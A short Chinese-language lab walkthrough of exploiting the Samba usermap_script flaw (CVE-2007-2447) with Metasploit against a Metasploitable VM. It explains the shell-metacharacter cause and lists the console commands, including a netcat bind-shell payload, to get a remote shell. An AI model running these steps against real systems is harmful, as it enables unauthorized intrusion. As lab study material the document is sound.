usermap_script:CVE-2007-2447
Samba用户名映射脚本命令执行
漏洞产生原因
传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
msf 中模块位置
exploit/multi/samba/usermap_script
这个模块利用漏洞执行命令,在Samba版本3.0.20到3.0.25rc3当使用非默认用户名映射脚本配置选项。
通过指定一个用户名包含shell元字符,攻击者可以执行任意命令。
不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名
漏洞复现
攻击机 kali
IP 192.168.195.133
靶机 Metasploitable_ubuntu
IP 192.168.195.132
- 搜索有关
samba
漏洞的代码库search samba
- 使用
usermap_script
代码use exploit/multi/samba/usermap_script
- 查看攻击载荷
show payloads
并选择bind_netcat即使用netcat工具在渗透攻击成功后执行shell并通过netcat绑定在一个监听端口上
set payload cmd/unix/bind_netcat
- 查看参数配置
show options
- 设置目标
ip
set RHOST 192.168.195.132
- 执行
exploit
成功获取靶机shell
exploit